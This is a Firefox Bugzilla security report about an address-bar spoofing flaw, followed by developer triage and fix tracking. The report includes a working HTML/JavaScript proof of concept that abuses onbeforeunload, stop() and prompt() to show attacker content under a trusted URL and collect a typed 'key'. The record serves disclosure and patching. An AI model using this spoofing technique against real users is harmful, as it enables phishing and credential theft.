Closed Bug 725611 Opened 8 years ago Closed 8 years ago

[CAL-2012-0019]Firefox website spoof vulnerability by hook event

Categories

(Firefox :: Address Bar, defect)

10 Branch
x86
Windows 7
defect
Not set

Tracking

()

VERIFIED FIXED
Firefox 14
Tracking Status
firefox12 --- wontfix
firefox13 + wontfix
firefox14 + verified
firefox-esr10 14+ verified

People

(Reporter: vulnhunt, Assigned: dao)

References

Details

(Whiteboard: [sg:moderate][advisory-tracking+] fixed by bug 724599 )

Attachments

(1 file)

Attached image screen.gif
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0
Build ID: 20120129021758

Steps to reproduce:

[CAL-2012-0019]Firefox website spoof vulnerability by hook event


1 Affected Products
=================
tested Firefox 10.0(last)


2 Vulnerability Details
=====================
Code Audit Labs of Vulnhunt.com(http://www.vulnhunt.com) has discovered a website spoof vulnerability in firefox which may Trick victims trust attack content as truested websit content like google in example.


3 POC:
====
open a html with following content
===================================
<h1 id="msg">type www.google.com in address bar for CAL-2012-0019 by Code Audit Labs of Vulnhunt.com</h1>
<h1 id="spoof"><input id="log"></h1>
<script type="text/javascript">
spoof.style.display = 'none';
var done = 0;
var got = 0;
onbeforeunload = function(ev) {
  done = 1;
  alert('Move your mouse now \nclick "Leave Page" with keyboard')
  return false;
}
onmousemove = function() {
  stop();
  //console.log(done)
  if (done && !got) {
    msg.style.display = 'none';
    got = prompt('enter your key?');
    if (got) {
      spoof.style.display = 'block';
      log.value = got;
    }
  }
}
</script>
===================================


4 About Code Audit Labs:
=====================
Code Audit Labs secure your software,provide Professional include source
code audit and binary code audit service.
Code Audit Labs:" You create value for customer,We protect your value"
http://www.VulnHunt.com
http://blog.vulnhunt.com
http://t.qq.com/vulnhunt
http://weibo.com/vulnhunt





Actual results:

spoof


Expected results:

not spoof
This is basically identical to bug 724599 but with slightly less explicit user interaction... I think we're going to have to revert the urlbar for script-initiated stop()s.
Status: UNCONFIRMED → NEW
Component: Untriaged → Location Bar
Depends on: CVE-2012-1950
Ever confirmed: true
QA Contact: untriaged → location.bar
Whiteboard: [sg:moderate]
The problem with that is that a page can put a stop() on a timeout to keep the user from editing the url bar text...  Can we revert only if we'd started a load from the url bar?
Can we subject stop() to popup abuse controls? As far as I can see, pages only need to use it in response to user interaction.
I kinda like that idea, actually.  It wouldn't be hard to do, for sure....
(In reply to neil@parkwaycc.co.uk from comment #3)
> Can we subject stop() to popup abuse controls? As far as I can see, pages
> only need to use it in response to user interaction.

filed bug 740295
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Whiteboard: [sg:moderate] → [sg:moderate] fixed by bug 724599
Target Milestone: --- → Firefox 14
I'm not seeing any difference in behavior with the PoC in comment 0 before and after bug 724599 was fixed.
That said, I don't see the behavior from the attached gif anywhere.
We're already tracking bug 724599 for ESR.
Moving tracking to 13 to make sure these fixes get verified when they land.
(In reply to Al Billings [:abillings] from comment #6)
> I'm not seeing any difference in behavior with the PoC in comment 0 before
> and after bug 724599 was fixed.

I still don't see any difference with Firefox 12 and the post-checkin build with the fix and the attached POC.
This is still being tracked for Firefox 13? Are we taking this on the beta branch (13) or not?
It's too late to land bug 724599 for Firefox 13.
Assignee: nobody → dao
Assigning this bug to Dao so that we can ensure there's someone on the hook to fix this for ESR.
Whiteboard: [sg:moderate] fixed by bug 724599 → [sg:moderate][advisory-tracking+] fixed by bug 724599
Since this is fixed by bug 724599 and that was checked into ESR, is there any reason to not mark this as fixed in status-firefox-esr10 field?
Marking this as verified for 14 and trunk since bug 724599 was verified by me there.
Status: RESOLVED → VERIFIED
Group: core-security
Transitively marking this verified for ESR based on my verification in bug 724599.
You need to log in before you can comment on or make changes to this bug.